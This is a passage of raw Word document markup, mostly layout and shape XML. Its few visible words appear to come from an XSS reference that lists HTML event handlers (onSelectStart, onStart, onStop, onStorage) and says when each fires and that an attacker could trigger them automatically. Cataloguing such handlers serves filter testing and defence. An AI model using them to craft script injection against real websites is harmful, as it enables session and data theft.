                              <a:gd name="T18" fmla="+- 0 312 154"/>
                              <a:gd name="T19" fmla="*/ 312 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1337"/>
                              <a:gd name="T22" fmla="+- 0 175 154"/>
                              <a:gd name="T23" fmla="*/ 175 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1337"/>
                              <a:gd name="T26" fmla="+- 0 154 154"/>
                              <a:gd name="T27" fmla="*/ 154 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3246 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1337"/>
                              <a:gd name="T30" fmla="+- 0 154 154"/>
                              <a:gd name="T31" fmla="*/ 154 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3267 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1337"/>
                              <a:gd name="T34" fmla="+- 0 175 154"/>
                              <a:gd name="T35" fmla="*/ 175 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3267 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1337"/>
                              <a:gd name="T38" fmla="+- 0 315 154"/>
                              <a:gd name="T39" fmla="*/ 315 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3249 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1337"/>
                              <a:gd name="T42" fmla="+- 0 336 154"/>
                              <a:gd name="T43" fmla="*/ 336 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3246 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1337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7" h="183">
                                <a:moveTo>
                                  <a:pt x="131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16" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1337" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1337" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1319" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="131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Text Box 85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133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onSelectStart()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7" o:spid="_x0000_s1575" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.7pt;width:66.85pt;height:9.15pt;z-index:-17593344;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,154" coordsize="133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">
                <v:shape id="Freeform 859" o:spid="_x0000_s1576" style="position:absolute;left:1930;top:154;width:1337;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="133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XBtccA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IKvYhuLFhDdJXWtiD0IEYRvD2y&#10;z2Tb7NuQ3Wr017uFgsdhZr5hZovO1uJErTeOFYyGCQjiwmnDpYLd9nOQgvABWWPtmBRcyMNi/tCb&#10;YabdmTd0ykMpIoR9hgqqEJpMSl9UZNEPXUMcvaNrLYYo21LqFs8Rbmv5nCQv0qLhuFBhQ8uKip/8&#10;1yr4OOx3I/P91U3KZb426aV/fXsnpZ4eu9cpiEBduIf/2yutIB1P4O9MPAJyf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lwbXHAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m1316,182l21,182r-3,l,161r,-3l,21,21,,1316,r21,21l1337,161r-18,21l1316,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1316,336;21,336;18,336;0,315;0,312;0,175;21,154;1316,154;1337,175;1337,315;1319,336;1316,336" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 858" o:spid="_x0000_s1577" type="#_x0000_t202" style="position:absolute;left:1930;top:154;width:133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QkWsEA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9C/sfwix401RB0WoUWVwQBLHWwx5nm7EN&#10;NpNuk9X6781B8Ph438t1Z2txo9YbxwpGwwQEceG04VLBOf8ezED4gKyxdkwKHuRhvfroLTHV7s4Z&#10;3U6hFDGEfYoKqhCaVEpfVGTRD11DHLmLay2GCNtS6hbvMdzWcpwkU2nRcGyosKGviorr6d8q2Pxw&#10;tjV/h99jdslMns8T3k+vSvU/u80CRKAuvMUv904rmE3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kJFrBAAAA3A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onSelectStart()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6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>needs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>some</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>auto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>initialize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>something</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>like: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336"/>
          <w:tab w:val="left" w:pos="1337"/>
        </w:tabs>
        <w:spacing w:before="131"/>
        <w:ind w:left="1336" w:hanging="1147"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>(fires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>beginning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>each</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>marquee</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>loop)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252"/>
          <w:tab w:val="left" w:pos="1253"/>
        </w:tabs>
        <w:ind w:left="1252" w:hanging="1063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2364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-118110</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="525145" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="853" name="Group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-186"/>
                          <a:chExt cx="827" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="854" name="Freeform 856"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="-186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-4 -186"/>
                              <a:gd name="T3" fmla="*/ -4 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 827"/>
                              <a:gd name="T6" fmla="+- 0 -4 -186"/>
                              <a:gd name="T7" fmla="*/ -4 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 827"/>
                              <a:gd name="T10" fmla="+- 0 -4 -186"/>
                              <a:gd name="T11" fmla="*/ -4 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 827"/>
                              <a:gd name="T14" fmla="+- 0 -25 -186"/>
                              <a:gd name="T15" fmla="*/ -25 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 827"/>
                              <a:gd name="T18" fmla="+- 0 -28 -186"/>
                              <a:gd name="T19" fmla="*/ -28 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 827"/>
                              <a:gd name="T22" fmla="+- 0 -165 -186"/>
                              <a:gd name="T23" fmla="*/ -165 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 827"/>
                              <a:gd name="T26" fmla="+- 0 -186 -186"/>
                              <a:gd name="T27" fmla="*/ -186 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2735 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 827"/>
                              <a:gd name="T30" fmla="+- 0 -186 -186"/>
                              <a:gd name="T31" fmla="*/ -186 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2756 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 827"/>
                              <a:gd name="T34" fmla="+- 0 -165 -186"/>
                              <a:gd name="T35" fmla="*/ -165 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2756 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 827"/>
                              <a:gd name="T38" fmla="+- 0 -25 -186"/>
                              <a:gd name="T39" fmla="*/ -25 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2739 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 827"/>
                              <a:gd name="T42" fmla="+- 0 -4 -186"/>
                              <a:gd name="T43" fmla="*/ -4 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2735 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 827"/>
                              <a:gd name="T46" fmla="+- 0 -4 -186"/>
                              <a:gd name="T47" fmla="*/ -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Text Box 85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-186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onStart()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4" o:spid="_x0000_s1578" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:-9.3pt;width:41.35pt;height:9.15pt;z-index:-17592832;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,-186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">
                <v:shape id="Freeform 856" o:spid="_x0000_s1579" style="position:absolute;left:1930;top:-186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oknsQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPS6vCMBSE9xf8D+EIbkRTxStajeID8S7c+EBcHppj&#10;W2xOShO1/nsjCHc5zMw3zHRem0I8qHK5ZQW9bgSCOLE651TB6bjpjEA4j6yxsEwKXuRgPmv8TDHW&#10;9sl7ehx8KgKEXYwKMu/LWEqXZGTQdW1JHLyrrQz6IKtU6gqfAW4K2Y+ioTSYc1jIsKRVRsntcDcK&#10;dst1Ot6ct/4i+6dx+3ZZok72SrWa9WICwlPt/8Pf9p9WMPodwOdMOAJy9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KJJ7EAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m805,182r-784,l18,182,,161r,-3l,21,21,,805,r21,21l826,161r-17,21l805,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="805,-4;21,-4;18,-4;0,-25;0,-28;0,-165;21,-186;805,-186;826,-165;826,-25;809,-4;805,-4" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 855" o:spid="_x0000_s1580" type="#_x0000_t202" style="position:absolute;left:1930;top:-186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WLxMUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74L/YXmF3nRTQbGpGxGpIBRKYzx4fM0+&#10;kyXZt2l21fTfdwWhx2FmvmFW68G24kq9N44VvEwTEMSl04YrBcdiN1mC8AFZY+uYFPySh3U2Hq0w&#10;1e7GOV0PoRIRwj5FBXUIXSqlL2uy6KeuI47e2fUWQ5R9JXWPtwi3rZwlyUJaNBwXauxoW1PZHC5W&#10;webE+bv5+fz+ys+5KYrXhD8WjVLPT8PmDUSgIfyHH+29VrCcz+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5YvE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onStart()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2416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471170" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="850" name="Group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154"/>
                          <a:chExt cx="742" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="851" name="Freeform 853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336 154"/>
                              <a:gd name="T3" fmla="*/ 336 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 742"/>
                              <a:gd name="T6" fmla="+- 0 336 154"/>
                              <a:gd name="T7" fmla="*/ 336 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 742"/>
                              <a:gd name="T10" fmla="+- 0 336 154"/>
                              <a:gd name="T11" fmla="*/ 336 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 742"/>
                              <a:gd name="T14" fmla="+- 0 315 154"/>
                              <a:gd name="T15" fmla="*/ 315 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 742"/>
                              <a:gd name="T18" fmla="+- 0 312 154"/>
                              <a:gd name="T19" fmla="*/ 312 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 742"/>
                              <a:gd name="T22" fmla="+- 0 175 154"/>
                              <a:gd name="T23" fmla="*/ 175 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 742"/>
                              <a:gd name="T26" fmla="+- 0 154 154"/>
                              <a:gd name="T27" fmla="*/ 154 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2650 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 742"/>
                              <a:gd name="T30" fmla="+- 0 154 154"/>
                              <a:gd name="T31" fmla="*/ 154 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2671 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 742"/>
                              <a:gd name="T34" fmla="+- 0 175 154"/>
                              <a:gd name="T35" fmla="*/ 175 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2671 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 742"/>
                              <a:gd name="T38" fmla="+- 0 315 154"/>
                              <a:gd name="T39" fmla="*/ 315 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2653 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 742"/>
                              <a:gd name="T42" fmla="+- 0 336 154"/>
                              <a:gd name="T43" fmla="*/ 336 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2650 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 742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Text Box 85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onStop()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1" o:spid="_x0000_s1581" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.7pt;width:37.1pt;height:9.15pt;z-index:-17592320;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,154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">
                <v:shape id="Freeform 853" o:spid="_x0000_s1582" style="position:absolute;left:1930;top:154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CyCsUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESP0WrCQBRE3wv+w3KFvhTdjdCi0TWIULRFKDX5gEv2&#10;mgSzd0N2m6R/3y0U+jjMzBlml022FQP1vnGsIVkqEMSlMw1XGor8dbEG4QOywdYxafgmD9l+9rDD&#10;1LiRP2m4hkpECPsUNdQhdKmUvqzJol+6jjh6N9dbDFH2lTQ9jhFuW7lS6kVabDgu1NjRsabyfv2y&#10;Gk5vl9ZPBZ5tjpvk/eOuLsOT0vpxPh22IAJN4T/81z4bDevnBH7PxCM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ULIKxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m720,182r-699,l18,182,,161r,-3l,21,21,,720,r21,21l741,161r-18,21l720,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="720,336;21,336;18,336;0,315;0,312;0,175;21,154;720,154;741,175;741,315;723,336;720,336" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 852" o:spid="_x0000_s1583" type="#_x0000_t202" style="position:absolute;left:1930;top:154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wTsMQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74L/YXkFb7qpoNjUVUQqCIIY48Hja/aZ&#10;LGbfptlV4793C4Ueh5n5hpkvO1uLO7XeOFbwPkpAEBdOGy4VnPLNcAbCB2SNtWNS8CQPy0W/N8dU&#10;uwdndD+GUkQI+xQVVCE0qZS+qMiiH7mGOHoX11oMUbal1C0+ItzWcpwkU2nRcFyosKF1RcX1eLMK&#10;VmfOvszP/vuQXTKT5x8J76ZXpQZv3eoTRKAu/If/2lutYDYZw+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ME7D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onStop()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7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>would</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>need</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>press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stop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>leave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webpage)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504"/>
          <w:tab w:val="left" w:pos="1506"/>
        </w:tabs>
        <w:spacing w:before="160"/>
        <w:ind w:hanging="1316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2467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633095" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="847" name="Group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166"/>
                          <a:chExt cx="997" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="848" name="Freeform 850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348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 997"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 997"/>
                              <a:gd name="T10" fmla="+- 0 348 166"/>
                              <a:gd name="T11" fmla="*/ 348 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 997"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 997"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 997"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 997"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2906 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 997"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2927 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 997"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2927 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 997"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2909 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 997"/>
                              <a:gd name="T42" fmla="+- 0 348 166"/>
                              <a:gd name="T43" fmla="*/ 348 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2906 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 997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Text Box 84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onStorage()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8" o:spid="_x0000_s1584" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.3pt;width:49.85pt;height:9.15pt;z-index:-17591808;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,166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">
                <v:shape id="Freeform 850" o:spid="_x0000_s1585" style="position:absolute;left:1930;top:166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jM2sIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9C/sfwizsRTR1FXG7RhFlYQ8qWPU+NmNb&#10;bCa1SbX+e3MQPD7e93TemlLcqHaFZQWDfgSCOLW64EzBYf/Xm4BwHlljaZkUPMjBfPbRmWKs7Z13&#10;dEt8JkIIuxgV5N5XsZQuzcmg69uKOHBnWxv0AdaZ1DXeQ7gp5XcUjaXBgkNDjhUtc0ovSWMUbK4/&#10;crUqL4vudn1uXHM6noZ6oNTXZ7v4BeGp9W/xy/2vFUxGYW04E46An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mMzawgAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m976,182r-955,l18,182,,161r,-3l,21,21,,976,r21,21l997,161r-18,21l976,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="976,348;21,348;18,348;0,327;0,324;0,187;21,166;976,166;997,187;997,327;979,348;976,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 849" o:spid="_x0000_s1586" type="#_x0000_t202" style="position:absolute;left:1930;top:166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EXHMUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVvNVNpYhJ3YgUCwVBGuOhx9fs&#10;S7KYfZtmtxr/fVcQPA4z8w2zXI22EycavHGs4GWagCCunDbcKDiUH88LED4ga+wck4ILeVjljw9L&#10;zLQ7c0GnfWhEhLDPUEEbQp9J6auWLPqp64mjV7vBYohyaKQe8BzhtpOzJJlLi4bjQos9vbdUHfd/&#10;VsH6m4uN+d39fBV1YcoyTXg7Pyo1eRrXbyACjeEevrU/tYLFaw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cRcc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onStorage()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(storage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>area</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>changed)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926"/>
          <w:tab w:val="left" w:pos="1927"/>
        </w:tabs>
        <w:ind w:left="1926" w:hanging="1737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2518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895350" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="844" name="Group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5350" cy="116205"/>
                          <a:chOff x="1930" y="154"/>
                          <a:chExt cx="1410" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="845" name="Freeform 847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1410" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3319 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1410"/>
                              <a:gd name="T2" fmla="+- 0 336 154"/>
                              <a:gd name="T3" fmla="*/ 336 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1410"/>
                              <a:gd name="T6" fmla="+- 0 336 154"/>
                              <a:gd name="T7" fmla="*/ 336 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
